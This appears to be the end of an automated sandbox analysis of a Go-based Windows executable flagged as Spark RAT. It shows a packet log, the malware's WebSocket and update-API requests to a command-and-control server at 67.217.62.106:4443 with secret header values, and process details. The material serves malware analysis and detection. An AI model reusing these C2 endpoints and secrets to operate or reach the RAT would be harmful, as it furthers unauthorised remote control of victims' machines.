          Oct 24, 2024 21:05:57.836127043 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:57.841578960 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:59.431247950 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:05:59.431871891 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:05:59.443062067 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:01.319329023 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:01.325325012 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:01.484344006 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:01.484793901 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:01.491425037 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:02.346704960 CEST497324443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:02.352999926 CEST44434973267.217.62.106192.168.2.4
          Oct 24, 2024 21:06:02.403352976 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:02.410204887 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:02.415644884 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:04.327090025 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:04.332636118 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:04.489411116 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:04.490351915 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:04.495904922 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:05.605618000 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:05.605916023 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:05.614820004 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:05.618036985 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:05.618104935 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:07.109932899 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:07.115555048 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:07.271703959 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:07.272597075 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:07.278018951 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:08.402741909 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:08.406516075 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:08.411951065 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:08.664489985 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:08.664647102 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:08.670228004 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:10.014416933 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:10.019931078 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:10.176069975 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:10.176343918 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:10.181761980 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:11.401842117 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:11.402100086 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:11.407460928 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:12.830413103 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:13.061747074 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:13.218065977 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:13.226794004 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:13.232218027 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:14.402975082 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:14.403276920 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:14.408787012 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:15.832873106 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:16.102958918 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:16.259599924 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:16.260060072 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:16.265852928 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:17.354965925 CEST497324443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:17.360380888 CEST44434973267.217.62.106192.168.2.4
          Oct 24, 2024 21:06:17.402997017 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:17.405230045 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:17.410604000 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:18.824517012 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:18.830084085 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:18.985969067 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:18.986190081 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:18.991677046 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:20.403948069 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:20.404337883 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:20.409755945 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:21.913734913 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:21.919361115 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:22.075236082 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:22.075783014 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:22.081310034 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:23.402797937 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:23.403120041 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:23.408638954 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:25.147624016 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:25.153302908 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:25.313617945 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:25.313899994 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:25.319777012 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:26.879837990 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:26.880408049 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:26.880481958 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:26.880855083 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:26.880901098 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:26.881989002 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:26.903801918 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:28.195923090 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:28.201617956 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:28.357841015 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:28.358191967 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:28.363718033 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:29.405468941 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:29.405762911 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:29.411262989 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:31.198678970 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:31.204178095 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:31.362453938 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:31.362768888 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:31.368592978 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:32.364017963 CEST497324443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:32.528004885 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:32.528286934 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:32.534708977 CEST44434973267.217.62.106192.168.2.4
          Oct 24, 2024 21:06:32.536520004 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:34.014225006 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:34.019980907 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:34.176819086 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:34.177262068 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:34.182697058 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:35.402256966 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:35.443872929 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:35.451384068 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:35.456778049 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:37.719757080 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:37.725847006 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:37.882121086 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:37.882411957 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:37.887969971 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:38.402908087 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:38.403325081 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:38.408802986 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:40.180389881 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:40.185856104 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:40.342020988 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:40.342297077 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:40.348222971 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:41.402761936 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:41.403155088 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:41.408866882 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:42.763861895 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:42.769393921 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:42.925414085 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:42.925762892 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:42.931240082 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:44.402942896 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:44.403285027 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:44.408741951 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:45.998311996 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:46.004153013 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:46.160419941 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:46.160736084 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:46.166234016 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:47.302642107 CEST497324443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:47.308784008 CEST44434973267.217.62.106192.168.2.4
          Oct 24, 2024 21:06:47.308904886 CEST497324443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:47.402090073 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:47.402374983 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:47.407660961 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:48.985363960 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:48.990953922 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:49.147010088 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:49.147280931 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:49.152816057 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:50.404511929 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:50.405035973 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:50.410581112 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:52.047235012 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:52.052817106 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:52.396748066 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:52.397146940 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:52.404232979 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:53.403271914 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:53.403646946 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:53.409034967 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:54.937479019 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:54.944180965 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:55.101622105 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:55.102005959 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:55.107546091 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:56.402525902 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:56.402868986 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:56.408440113 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:58.241570950 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:58.248090982 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:58.404381990 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:58.404664993 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:58.410191059 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:59.402826071 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:06:59.403165102 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:06:59.408615112 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:07:00.830259085 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:07:00.835886955 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:07:00.991880894 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:07:00.993027925 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:07:00.999047995 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:07:02.403261900 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:07:02.449398994 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:07:02.535085917 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:07:02.540661097 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:07:02.663747072 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:07:02.663885117 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:07:02.669698000 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:07:04.041670084 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:07:04.048088074 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:07:04.204052925 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:07:04.204503059 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:07:04.210136890 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:07:05.402874947 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:07:05.403156042 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:07:05.408659935 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:07:07.014887094 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:07:07.020857096 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:07:07.177175999 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:07:07.182059050 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:07:07.187566996 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:07:08.404243946 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:07:08.404584885 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:07:08.410067081 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:07:09.740206003 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:07:09.745815039 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:07:09.902614117 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:07:09.905647039 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:07:09.911057949 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:07:11.402868032 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:07:11.403444052 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:07:11.408998013 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:07:12.764286995 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:07:12.769799948 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:07:12.928937912 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:07:12.929220915 CEST497304443192.168.2.467.217.62.106
          Oct 24, 2024 21:07:12.935950994 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:07:14.402348042 CEST44434973067.217.62.106192.168.2.4
          Oct 24, 2024 21:07:14.445362091 CEST497304443192.168.2.467.217.62.106
          • 67.217.62.106:4443
          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.44973067.217.62.10644437004C:\Users\user\Desktop\msoia.exe
          TimestampBytes transferredDirectionData
          Oct 24, 2024 21:05:10.986990929 CEST302OUTGET /ws HTTP/1.1
          Host: 67.217.62.106:4443
          User-Agent: Go-http-client/1.1
          Connection: Upgrade
          Key: 4fdab31bb8e2932dfe20f92f3fdea3e6eebd95389486a97ad3543bb1583efe62
          Sec-WebSocket-Key: jhCCtGGF33HQoR6MWGiUwQ==
          Sec-WebSocket-Version: 13
          UUID: b43dfc4b543363da522193b18b484cdb
          Upgrade: websocket
          Oct 24, 2024 21:05:11.661786079 CEST203INHTTP/1.1 101 Switching Protocols
          Upgrade: websocket
          Connection: Upgrade
          Sec-WebSocket-Accept: rziYOmVl+vOQTZC6HC0nmRpS2UU=
          Secret: 9720ab8477877d05d378b601eb96dd83d800b53b6e2aeb71f69584a5b85b7ee6


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          1192.168.2.44973267.217.62.10644437004C:\Users\user\Desktop\msoia.exe
          TimestampBytes transferredDirectionData
          Oct 24, 2024 21:05:16.640028954 CEST742OUTPOST /api/client/update?arch=amd64&commit=08059e95dacafe0bf6e5782f8e2c8ec9cd8c5a17&os=windows HTTP/1.1
          Host: 67.217.62.106:4443
          User-Agent: SPARK COMMIT: 08059e95dacafe0bf6e5782f8e2c8ec9cd8c5a17
          Content-Length: 384
          Content-Type: application/octet-stream
          Secret: 9720ab8477877d05d378b601eb96dd83d800b53b6e2aeb71f69584a5b85b7ee6
          Accept-Encoding: gzip
          Data Raw: 00 d1 90 85 18 8b ff 63 98 5e 11 5e 5d b8 69 9e 0f 49 58 c3 2f 19 02 7d f2 15 50 2a 9c 28 49 96 4b df 81 9d b6 f0 bc d5 80 19 14 f1 3e 58 d4 71 3d 91 b2 c8 8c 7b 77 cf fc c2 6d 39 a2 b0 3c 29 f6 e3 42 96 e0 37 ad 9a 86 3b 45 1b b1 1b 97 f3 79 24 d7 2f 8d 44 ab 4b bb 42 41 db 78 e1 69 5e ca 75 94 a9 9b f5 53 e8 5c c1 36 85 7e d9 e9 41 4e 00 38 1e 1b 76 82 2f fb 85 d1 d0 88 86 2c fc 6f aa 8a 58 46 8a 30 61 fb 6f ca ad a8 a0 c5 9b c1 a2 d4 f3 22 da ec 6b 66 6b 36 64 87 88 ed da 4e fc fc 2e 12 e3 84 68 40 f6 cb 76 b1 25 4d 1a b9 a3 0d f9 d6 85 72 de 26 7d 13 09 73 69 0d 3d 06 5c 7a 45 4f 86 a6 0a 74 e4 ff 04 a4 c7 b9 e7 6a 6e e3 68 1f e5 03 dc d4 68 e4 5e 30 03 59 f6 68 1f 64 af cb 5d 03 2e 39 3f 39 67 f4 9a a7 e9 5a 53 bb 85 c7 8c 08 0e 55 f3 7e 0b d0 56 13 ec 7c 5d 39 45 f5 83 d3 29 67 7b 08 9d b7 3c 07 1f 06 96 98 c9 68 89 23 fb 0e 23 50 2e ae 1a 6f 97 6f 00 96 11 47 f3 65 09 5a e1 1c 89 a7 81 1f 60 34 58 78 0d f8 e2 c7 18 0c 3a 69 7e 73 7c 8e 96 8d 7c 49 de e2 97 85 7a 3e b7 3e 7c ff 2d f9 13 1c f2 [TRUNCATED]
          Data Ascii: c^^]iIX/}P*(IK>Xq={wm9<)B7;Ey$/DKBAxi^uS\6~AN8v/,oXF0ao"kfk6dN.h@v%Mr&}si=\zEOtjnhh^0Yhd].9?9gZSU~V|]9E)g{<h##P.ooGeZ`4Xx:i~s||Iz>>|-pk~mNns=ygaM_MyA5
          Oct 24, 2024 21:05:17.306231022 CEST133INHTTP/1.1 200 OK
          Content-Type: application/json; charset=utf-8
          Date: Thu, 24 Oct 2024 19:05:17 GMT
          Content-Length: 10
          Data Raw: 7b 22 63 6f 64 65 22 3a 30 7d
          Data Ascii: {"code":0}


          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Click to jump to process

          Target ID:0
          Start time:15:05:06
          Start date:24/10/2024
          Path:C:\Users\user\Desktop\msoia.exe
          Wow64 process (32bit):false
          Commandline:"C:\Users\user\Desktop\msoia.exe"
          Imagebase:0xd30000
          File size:16'498'688 bytes
          MD5 hash:42CBC8F4803DA0F2B8BBD3D13A37FC58
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:Go lang
          Yara matches:
          • Rule: JoeSecurity_SparkRAT, Description: Yara detected Spark RAT, Source: 00000000.00000002.3007239925.00000000010A9000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
          Reputation:low
          Has exited:false

          Target ID:1
          Start time:15:05:06
          Start date:24/10/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff7699e0000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          Target ID:2
          Start time:15:05:09
          Start date:24/10/2024
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:cmd ver
          Imagebase:0x7ff772340000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          No disassembly